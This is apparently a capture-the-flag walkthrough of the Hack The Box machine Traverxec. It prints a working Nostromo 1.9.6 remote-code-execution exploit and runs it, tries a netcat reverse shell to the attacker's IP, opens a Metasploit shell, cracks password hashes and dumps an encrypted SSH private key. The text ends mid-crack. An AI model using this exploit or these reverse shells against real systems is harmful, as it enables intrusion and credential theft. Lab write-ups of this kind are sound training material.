Quick Summary
→ Traverxec is another beginner friendly machine that runs on Linux. The machine has two open ports which is port 22 & 80 that basically running a SSH and HTTP Service. There is nothing to use on the website when I tried to look something but the website’s has middleware service Nostromo 1.9.6 has a directory traversal bypass that causes RCE or Remote Code Execution and enter into www-data.
After entering the target machine it seems that user directory give us Permission's denied but when I was look at the configuration file we can enter at /public_www/ based on the $HOMEDIRS. The directory contains SSH Key which I use to enter for user david.
The Privilege Escalation part was tricky. As the user has can run journalctl that has root privileges and to get the root is to change the size of our terminal shell into small so I can execute !/bin/bash command and get the administrator shell.
Penetration Testing Methodologies
Network Scanning
→ Nmap scan
→ discover open ports and what services are running
Enumeration
→ Browsing the HTTP Service
→ Search about Nostromo 1.9.6
Post - Exploitation
→ Enumerate machine with Nostromo 1.9.6 Exploit
→ Metasploit to gain direct access
→ run LinEnum or Scripted Local Linux Enumeration & Privilege Escalation Checks to look for interesting inside the machine
→ Decrypt the password hash that appear on the script.
→ Looking at configuration file we allowed to enter /public_www/
Exploitation
→ copy the backup-ssh-key at the /tmp/ directory
→ enumerate david files we see SSH Key
→ decrypt SSH Key with ssh2john and decrypt the hash with John
→ Login with SSH Key and use the passphrase we decrypt and get the user.txt
Privilege Escalation
→ Abuse what the user is allowed to run which is the journalctl
→ with GTFObins I see that i can execute a shell with journalctl
→ change the terminal into small size and execute !/bin/bash and become root
→ Finally get the root.txt
Network Scanning
Walkthrough
→ I always begin at NMAP to look on the services what is running. I always use
- -sV ⇒ Probe open ports to determine service/version info
- -sC ⇒ equivalent to —script=default
- -T 0-5 ⇒ Set timing template - higher is faster (less accurate)
- -A- ⇒ Agressive scan
- -oN ⇒ to save our scan results to a text file
# bash
nmap -sV -sC -A -T4 10.10.10.165 -oN nmap-Traverxec
|
# bash
root in htb/boxes/Traverxec
❯ nmap -sV -sC -A -T4 10.10.10.165 -oN nmap-Traverxec
Starting Nmap 7.80 ( https:
Nmap scan report for 10.10.10.165
Host is up (0.26s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 258.62 ms 10.10.14.1
2 264.54 ms 10.10.10.165
OS and Service detection performed. Please report any incorrect results at https:
Nmap done: 1 IP address (1 host up) scanned in 37.77 seconds
root in htb/boxes/Traverxec took 38s
❯
|
Nmap results
So there’s port open.
- 22 ⇒ which basically use for SSH Connections
- 80 ⇒ which basically running a website also there’s running a service which is
Nostromo at version 1.9.6
Enumeration
Traverxec Website
Since there’s Web Service running, I will look at it and try what should I got so:
So we have a hint from the front page of the website. I got a user named – David White i will take note this because there’s a possibly that guy we will be our user.
also the website’s a has a contact form but not much interesting.
other than there’s no more stuffs on the web’ so I’ll gonna move on the next phase.
In my nmap scan results’ the HTTP Service has running Nostromo 1.9.6 i try to use searchsploit to look if there’s a vulnerability in that service and yes it has.
Nostromo 1.9.6
# bash
root in htb/boxes/Traverxec
❯ searchsploit nostromo
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Nostromo - Directory Traversal Remote Command Execution (Metasploit) | exploits/multiple/remote/47573.rb
nostromo 1.9.6 - Remote Code Execution | exploits/multiple/remote/47837.py
nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution | exploits/linux/remote/35466.sh
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root in htb/boxes/Traverxec
❯
|
It was a directory traversal attack which is lead to Remote Command Execution. I try to look on the exploit with searchsploit again with -x
# bash
root in htb/boxes/Traverxec
❯ searchsploit -x nostromo 1.9.6 - Remote Code Execution | exploits/multiple/remote/47837.py
|
and the code exploit:
import sys
import socket
art = """
_____-2019-16278
_____ _______ ______ _____\ \
_____\ \_\ | | | / / | |
/ /| || / / /|/ / /___/|
/ / /____/||\ \ \ |/| |__ |___|/
| | |____|/ \ \ \ | | | \
| | _____ \| \| | | __/ __
|\ \|\ \ |\ /| |\ \ / \
| \_____\| | | \_______/ | | \____\/ |
| | /____/| \ | | / | | |____/|
\|_____| || \|_____|/ \|____| | |
|____|/ |___|/
"""
help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'
def connect(soc):
response = ""
try:
while True:
connection = soc.recv(1024)
if len(connection) == 0:
break
response += connection
except:
pass
return response
def cve(target, port, cmd):
soc = socket.socket()
soc.connect((target, int(port)))
payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
soc.send(payload)
receive = connect(soc)
print(receive)
if __name__ == "__main__":
print(art)
try:
target = sys.argv[1]
port = sys.argv[2]
cmd = sys.argv[3]
cve(target, port, cmd)
except IndexError:
print(help_menu)
root in htb/boxes/Traverxec
❯
|
Post - Exploitation
Enumerate Traverxec machine
I search about the Nostromo 1.9.6 vulnerabilities, using the exploit that I have, i can execute a command like whoami and hostname so:
root in htb/boxes/Traverxec via 🐍 v2.7.17
❯ python cve2019_16278.py 10.10.10.165 80 whoami
_____-2019-16278
_____ _______ ______ _____\ \
_____\ \_\ | | | / / | |
/ /| || / / /|/ / /___/|
/ / /____/||\ \ \ |/| |__ |___|/
| | |____|/ \ \ \ | | | \
| | _____ \| \| | | __/ __
|\ \|\ \ |\ /| |\ \ / \
| \_____\| | | \_______/ | | \____\/ |
| | /____/| \ | | / | | |____/|
\|_____| || \|_____|/ \|____| | |
|____|/ |___|/
HTTP/1.1 200 OK
Date: Fri, 9 Apr 2020 22:18:22 GMT
Server: nostromo 1.9.6
Connection: close
www-data
root in htb/boxes/Traverxec via 🐍 v2.7.17
❯
|
as you can see It give me results – www-data. next I try the hostname:
root in htb/boxes/Traverxec via 🐍 v2.7.17
❯ python cve2019_16278.py 10.10.10.165 80 hostname
_____-2019-16278
_____ _______ ______ _____\ \
_____\ \_\ | | | / / | |
/ /| || / / /|/ / /___/|
/ / /____/||\ \ \ |/| |__ |___|/
| | |____|/ \ \ \ | | | \
| | _____ \| \| | | __/ __
|\ \|\ \ |\ /| |\ \ / \
| \_____\| | | \_______/ | | \____\/ |
| | /____/| \ | | / | | |____/|
\|_____| || \|_____|/ \|____| | |
|____|/ |___|/
HTTP/1.1 200 OK
Date: Fri, 9 Apr 2020 22:19:45 GMT
Server: nostromo 1.9.6
Connection: close
traverxec
root in htb/boxes/Traverxec via 🐍 v2.7.17
❯
|
and It gives me result hostname – traverxec. Now since I can execute a command i’ll try to use netcat if i can gain reverse shell, but it’s not working it gives me an error Cmd line: wrong
root in htb/boxes/Traverxec via 🐍 v2.7.17
❯ python cve2019_16278.py 10.10.10.165 80 nc 10.10.15.21 1339 -e /bin/bash
_____-2019-16278
_____ _______ ______ _____\ \
_____\ \_\ | | | / / | |
/ /| || / / /|/ / /___/|
/ / /____/||\ \ \ |/| |__ |___|/
| | |____|/ \ \ \ | | | \
| | _____ \| \| | | __/ __
|\ \|\ \ |\ /| |\ \ / \
| \_____\| | | \_______/ | | \____\/ |
| | /____/| \ | | / | | |____/|
\|_____| || \|_____|/ \|____| | |
|____|/ |___|/
HTTP/1.1 200 OK
Date: Fri, 10 Apr 2020 22:21:52 GMT
Server: nostromo 1.9.6
Connection: close
Cmd line: wrong
root in htb/boxes/Traverxec via 🐍 v2.7.17
❯
|
So I try Rapi7 - MetaSploit to direct access in the target machine and obtain remote shell, I search about Nostromo exploit and it is very exact what I needed so :
root in htb/boxes/Traverxec via 🐍 v2.7.17
❯ msfconsole
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
=[ metasploit v5.0.80-dev ]
+ -- --=[ 1983 exploits - 1085 auxiliary - 339 post ]
+ -- --=[ 563 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Writing a custom module? After editing your module, why not try the reload command
msf5 > search nostromo
Matching Modules
================
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/nostromo_code_exec 2019-10-20 good Yes Nostromo Directory Traversal Remote Command Execution
msf5 >
|
Now i will use it but first we need to see the options so I can see what is the requirements :
msf5 > use exploit/multi/http/nostromo_code_exec
msf5 exploit(multi/http/nostromo_code_exec) > show options
Module options (exploit/multi/http/nostromo_code_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (Unix In-Memory)
msf5 exploit(multi/http/nostromo_code_exec) >
|
Get in into the machine
So RHOSTS or the target host which is the Traverxec and LHOST or the attackers IP (me) that I will input and do the exploitation.
msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS 10.10.10.165
RHOSTS => 10.10.10.165
msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 10.10.15.21
LHOST => 10.10.15.21
msf5 exploit(multi/http/nostromo_code_exec) > exploit
[*] Started reverse TCP handler on 10.10.15.21:4444
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.10.15.21:4444 -> 10.10.10.165:51530) at 2020-04-11 06:45:16 +0800
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
so I have now direct access to machine. but I need to upgrade it into interactive shell with python :
python -c 'import pty; pty.spawn("/bin/bash");'
|
Finally I have now the www-data :
www-data@traverxec:/usr/bin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@traverxec:/usr/bin$
|
WWW-DATA
Now that i’m in, the enumeration start again’ to do this quickly I use LinEnum.sh this script is very useful if the attacker is trying to look what they need to do exploit exploit or use some stuffs for privilege escalation so from my Kali Linux machine I’ll transfer LinEnum.sh in /tmp folder and run it.
www-data@traverxec:/tmp$ ls
ls
systemd-private-587b5e2d5cd0457081bf5a03c6d18e2a-systemd-timesyncd.service-TqSk1v
vmware-root
vmware-root_557-4282236562
www-data@traverxec:/tmp$ wget http://10.10.15.21/LinEnum.sh
wget http://10.10.15.21/LinEnum.sh
--2020-04-10 19:02:22-- http://10.10.15.21/LinEnum.sh
Connecting to 10.10.15.21:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: 'LinEnum.sh'
LinEnum.sh 100%[===================>] 45.54K 59.0KB/s in 0.8s
2020-04-10 19:02:24 (59.0 KB/s) - 'LinEnum.sh' saved [46631/46631]
www-data@traverxec:/tmp$ ls
ls
LinEnum.sh
linux-exploit-suggester.sh
systemd-private-587b5e2d5cd0457081bf5a03c6d18e2a-systemd-timesyncd.service-TqSk1v
vmware-root
vmware-root_557-4282236562
www-data@traverxec:/tmp$
|
And ofcourse running this it will give us a basic information about the target :
www-data@traverxec:/tmp$ bash LinEnum.sh
bash LinEnum.sh
[-] Debug Info
[+] Thorough tests = Disabled
Scan started at:
Fri Apr 10 19:03:30 EDT 2020
[-] Kernel information:
Linux traverxec 4.19.0-6-amd64
[-] Kernel information (continued):
Linux version 4.19.0-6-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6))
[-] Specific release information:
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
[-] Hostname:
traverxec
[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
and there’s a previously login and that will be our user named – david
[-] Users that have previously logged onto the system:
Username Port From Latest
root tty1 Sat Nov 16 16:07:31 -0500 2019
david pts/4 10.10.15.162 Fri Apr 09 18:59:23 -0400 2020
|
I can also see what’s the user password in /etc/passwd based on david:x:1000:1000:david,,,:/home/david:/bin/bash :
[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
david:x:1000:1000:david,,,:/home/david:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
|
but the script is doing that for me ;)
[-] htpasswd found - could contain passwords:
/var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
|
Now that I have a password hash for david I use john decrypt it with rockyou.txt wordlists. and I got the password Nowonly4me
# bash
root in htb/boxes/Traverxec via 🐍 v2.7.17
❯ john david --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Nowonly4me (david)
1g 0:00:05:49 DONE (2020-04-11 07:12) 0.002864g/s 30305p/s 30305c/s 30305C/s Noyoudo..Nous4=5
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root in htb/boxes/Traverxec via 🐍 v2.7.17 took 5m49s
❯
|
I try to login into SSH with I password I got but it seems is not the right password. It just a rabbit hole. so moved on try to look again with other stuffs. so I’ll go at home directory it doesn’t allow me to look into files.
# bash
www-data@traverxec:/usr/bin$ cd /home
cd /home
www-data@traverxec:/home$ ls
ls
david
www-data@traverxec:/home$ cd david
cd david
www-data@traverxec:/home/david$ ls
ls
ls: cannot open directory '.': Permission denied
www-data@traverxec:/home/david$
|
So I’ll try to look more on the machine folder’ I go first at /var/ directory and I see a nostromo which is very interesting.
www-data@traverxec:/home/david$ cd /var
cd /var
www-data@traverxec:/var$ ls
ls
backups cache lib local lock log mail nostromo opt run spool tmp
www-data@traverxec:/var$
|
Looking at the nostromo folder there was a configuration file which is the nhttpd.conf and this will give me a big hint what to do next.
www-data@traverxec:/var/nostromo$ ls
ls
conf htdocs icons logs
www-data@traverxec:/var/nostromo$ file conf
file conf
conf: directory
www-data@traverxec:/var/nostromo$ cd conf
cd conf
www-data@traverxec:/var/nostromo/conf$ ls
ls
mimes nhttpd.conf
www-data@traverxec:/var/nostromo/conf$
|
The nhttpd.conf has given instructions :
www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
cat nhttpd.conf
servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html
logpid logs/nhttpd.pid
user www-data
htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd
/icons /var/nostromo/icons
homedirs /home
homedirs_public public_www
www-data@traverxec:/var/nostromo/conf$
homedirs /home
homedirs_public public_www
www-data@traverxec:/var/nostromo/conf$
|
Exploitation
HOME DIRECTORY
based on the line $HOMEDIRS we can access /public_www at /home/david directory even it is given us permission’s denied so i go back to the david’s directory and enter to public_www folder
www-data@traverxec:/var/nostromo/conf$ cd /home/david
cd /home/david
www-data@traverxec:/home/david$ ls
ls
ls: cannot open directory '.': Permission denied
www-data@traverxec:/home/david$
www-data@traverxec:/home/david$ cd public_www
cd public_www
www-data@traverxec:/home/david/public_www$ ls
ls
index.html protected-file-area
www-data@traverxec:/home/david/public_www$
|
well there was a protected-file-area and I think it contains data hoping that this one is password but it is a backup-ssh-key not bad ! so :
www-data@traverxec:/home/david/public_www$ cd protected-file-area
cd protected-file-area
www-data@traverxec:/home/david/public_www/protected-file-area$ ls
ls
backup-ssh-identity-files.tgz
www-data@traverxec:/home/david/public_www/protected-file-area$
|
Well since I dont have permission on that folder to do write I unzip and copy the .tgz file into /tmp directory so :
www-data@traverxec:/home/david/public_www/protected-file-area$ tar zxvf backup-ssh-identity-files.tgz -C /tmp
<rea$ tar zxvf backup-ssh-identity-files.tgz -C /tmp
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub
www-data@traverxec:/home/david/public_www/protected-file-area$
|
I see that there was ssh-key files which I can use to get in with user david.
www-data@traverxec:/home/david/public_www/protected-file-area$ cd /tmp
cd /tmp
www-data@traverxec:/tmp$ ls
ls
home
systemd-private-52315d40046b4b63a760a2af02bc88ef-systemd-timesyncd.service-3xyrna
update
vmware-root
vmware-root_556-2966037836
www-data@traverxec:/tmp$ cd home
cd home
www-data@traverxec:/tmp/home$ ls
ls
david
www-data@traverxec:/tmp/home$ cd david
cd david
www-data@traverxec:/tmp/home/david$ ls -la
ls -la
total 12
drwxr-xr-x 3 www-data www-data 4096 Apr 10 19:37 .
drwxr-xr-x 3 www-data www-data 4096 Apr 10 19:37 ..
drwx------ 2 www-data www-data 4096 Oct 25 17:02 .ssh
www-data@traverxec:/tmp/home/david$ cd .ssh
cd .ssh
www-data@traverxec:/tmp/home/david/.ssh$ ls
ls
authorized_keys id_rsa id_rsa.pub
|
Now what i need is to copy the id_rsa into my machine.
www-data@traverxec:/tmp/home/david/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,477EEFFBA56F9D283D349033D5D08C4F
seyeH/feG19TlUaMdvHZK/2qfy8pwwdr9sg75x4hPpJJ8YauhWorCN4LPJV+wfCG
tuiBPfZy+ZPklLkOneIggoruLkVGW4k4651pwekZnjsT8IMM3jndLNSRkjxCTX3W
KzW9VFPujSQZnHM9Jho6J8O8LTzl+s6GjPpFxjo2Ar2nPwjofdQejPBeO7kXwDFU
RJUpcsAtpHAbXaJI9LFyX8IhQ8frTOOLuBMmuSEwhz9KVjw2kiLBLyKS+sUT9/V7
HHVHW47Y/EVFgrEXKu0OP8rFtYULQ+7k7nfb7fHIgKJ/6QYZe69r0AXEOtv44zIc
Y1OMGryQp5CVztcCHLyS/9GsRB0d0TtlqY2LXk+1nuYPyyZJhyngE7bP9jsp+hec
dTRqVqTnP7zI8GyKTV+KNgA0m7UWQNS+JgqvSQ9YDjZIwFlA8jxJP9HsuWWXT0ZN
6pmYZc/rNkCEl2l/oJbaJB3jP/1GWzo/q5JXA6jjyrd9xZDN5bX2E2gzdcCPd5qO
xwzna6js2kMdCxIRNVErnvSGBIBS0s/OnXpHnJTjMrkqgrPWCeLAf0xEPTgktqi1
Q2IMJqhW9LkUs48s+z72eAhl8naEfgn+fbQm5MMZ/x6BCuxSNWAFqnuj4RALjdn6
i27gesRkxxnSMZ5DmQXMrrIBuuLJ6gHgjruaCpdh5HuEHEfUFqnbJobJA3Nev54T
fzeAtR8rVJHlCuo5jmu6hitqGsjyHFJ/hSFYtbO5CmZR0hMWl1zVQ3CbNhjeIwFA
bzgSzzJdKYbGD9tyfK3z3RckVhgVDgEMFRB5HqC+yHDyRb+U5ka3LclgT1rO+2so
uDi6fXyvABX+e4E4lwJZoBtHk/NqMvDTeb9tdNOkVbTdFc2kWtz98VF9yoN82u8I
Ak/KOnp7lzHnR07dvdD61RzHkm37rvTYrUexaHJ458dHT36rfUxafe81v6l6RM8s
9CBrEp+LKAA2JrK5P20BrqFuPfWXvFtROLYepG9eHNFeN4uMsuT/55lbfn5S41/U
rGw0txYInVmeLR0RJO37b3/haSIrycak8LZzFSPUNuwqFcbxR8QJFqqLxhaMztua
4mOqrAeGFPP8DSgY3TCloRM0Hi/MzHPUIctxHV2RbYO/6TDHfz+Z26ntXPzuAgRU
/8Gzgw56EyHDaTgNtqYadXruYJ1iNDyArEAu+KvVZhYlYjhSLFfo2yRdOuGBm9AX
JPNeaxw0DX8UwGbAQyU0k49ePBFeEgQh9NEcYegCoHluaqpafxYx2c5MpY1nRg8+
XBzbLF9pcMxZiAWrs4bWUqAodXfEU6FZv7dsatTa9lwH04aj/5qxEbJuwuAuW5Lh
hORAZvbHuIxCzneqqRjS4tNRm0kF9uI5WkfK1eLMO3gXtVffO6vDD3mcTNL1pQuf
SP0GqvQ1diBixPMx+YkiimRggUwcGnd3lRBBQ2MNwWt59Rri3Z4Ai0pfb1K7TvOM
j1aQ4bQmVX8uBoqbPvW0/oQjkbCvfR4Xv6Q+cba/FnGNZxhHR8jcH80VaNS469tt
VeYniFU/TGnRKDYLQH2x0ni1tBf0wKOLERY0CbGDcquzRoWjAmTN/PV2VbEKKD/w
-----END RSA PRIVATE KEY-----
www-data@traverxec:/tmp/home/david/.ssh$
|
Decrypt SSH Key with ssh2john
I try to login in SSH with id_rsa I thought i can get in into machine but it needs a passphrase’ to get that i decrypt id_rsa with ssh2john to get the hash.
# bash
root in htb/boxes/Traverxec via 🐍 v2.7.17 took 3s
❯ python ssh2john.py id_rsa > id_rsa-hash
root in htb/boxes/Traverxec via 🐍 v2.7.17
❯ ls
cve2019_16278.py david id_rsa id_rsa-hash LinEnum.sh nmap-Traverxec ssh2john.py
root in htb/boxes/Traverxec via 🐍 v2.7.17
❯ cat id_rsa-hash
id_rsa:$sshng$1$16$477EEFFBA56F9D283D349033D5D08C4F$1200$b1ec9e1ff7de1b5f5395468c76f1d92bfdaa7f2f29c3076bf6c83be71e213e9249f186ae856a2b08de0b3c957ec1f086b6e8813df672f993e494b90e9de220828aee2e45465b8938eb9d69c1e9199e3b13f0830cde39dd2cd491923c424d7dd62b35bd5453ee8d24199c733d261a3a27c3bc2d3ce5face868cfa45c63a3602bda73f08e87dd41e8cf05e3bb917c0315444952972c02da4701b5da248f4b1725fc22143c7eb4ce38bb81326b92130873f4a563c369222c12f2292fac513f7f57b1c75475b8ed8fc454582b1172aed0e3fcac5b5850b43eee4ee77dbedf1c880a27fe906197baf6bd005c43adbf8e3321c63538c1abc90a79095ced7021cbc92ffd1ac441d1dd13b65a98d8b5e4fb59ee60fcb26498729e013b6cff63b29fa179c75346a56a4e73fbcc8f06c8a4d5f8a3600349bb51640d4be260aaf490f580e3648c05940f23c493fd1ecb965974f464dea999865cfeb36408497697fa096da241de33ffd465b3a3fab925703a8e3cab77dc590cde5b5f613683375c08f779a8ec70ce76ba8ecda431d0b121135512b9ef486048052d2cfce9d7a479c94e332b92a82b3d609e2c07f4c443d3824b6a8b543620c26a856f4b914b38f2cfb3ef6780865f276847e09fe7db426e4c319ff1e810aec52356005aa7ba3e1100b8dd9fa8b6ee07ac464c719d2319e439905ccaeb201bae2c9ea01e08ebb9a0a9761e47b841c47d416a9db2686c903735ebf9e137f3780b51f2b5491e50aea398e6bba862b6a1ac8f21c527f852158b5b3b90a6651d21316975cd543709b3618de2301406f3812cf325d2986c60fdb727cadf3dd17245618150e010c1510791ea0bec870f245bf94e646b72dc9604f5acefb6b28b838ba7d7caf0015fe7b8138970259a01b4793f36a32f0d379bf6d74d3a455b4dd15cda45adcfdf1517dca837cdaef08024fca3a7a7b9731e7474eddbdd0fad51cc7926dfbaef4d8ad47b1687278e7c7474f7eab7d4c5a7def35bfa97a44cf2cf4206b129f8b28003626b2b93f6d01aea16e3df597bc5b5138b61ea46f5e1cd15e378b8cb2e4ffe7995b7e7e52e35fd4ac6c34b716089d599e2d1d1124edfb6f7fe169222bc9c6a4f0b6731523d436ec2a15c6f147c40916aa8bc6168ccedb9ae263aaac078614f3fc0d2818dd30a5a113341e2fcccc73d421cb711d5d916d83bfe930c77f3f99dba9ed5cfcee020454ffc1b3830e7a1321c369380db6a61a757aee609d62343c80ac402ef8abd56616256238522c57e8db245d3ae1819bd01724f35e6b1c340d7f14c066c0432534938f5e3c115e120421f4d11c61e802a0796e6aaa5a7f1631d9ce4ca58d67460f3e5c1cdb2c5f6970cc598805abb386d652a0287577c453a159bfb76c6ad4daf65c07d386a3ff9ab111b26ec2e02e5b92e184e44066f6c7b88c42ce77aaa918d2e2d3519b4905f6e2395a47cad5e2cc3b7817b557df3babc30f799c4cd2f5a50b9f48fd06aaf435762062c4f331f989228a6460814c1c1a777795104143630dc16b79f51ae2dd9e008b4a5f6f52bb4ef38c8f5690e1b426557f2e068a9b3ef5b4fe842391b0af7d1e17bfa43e71b6bf16718d67184747c8dc1fcd1568d4b8ebdb6d55e62788553f4c69d128360b407db1d278b5b417f4c0a38b11163409b18372abb34685a30264cdfcf57655b10a283ff0
root in htb/boxes/Traverxec via 🐍 v2.7.17
❯
|
Now that I have the hash it’s time to use John to decrypt and get the password.
# bash
root in htb/boxes/Traverxec via 🐍 v2.7.17
❯ john id_rsa-hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter (id_rsa)
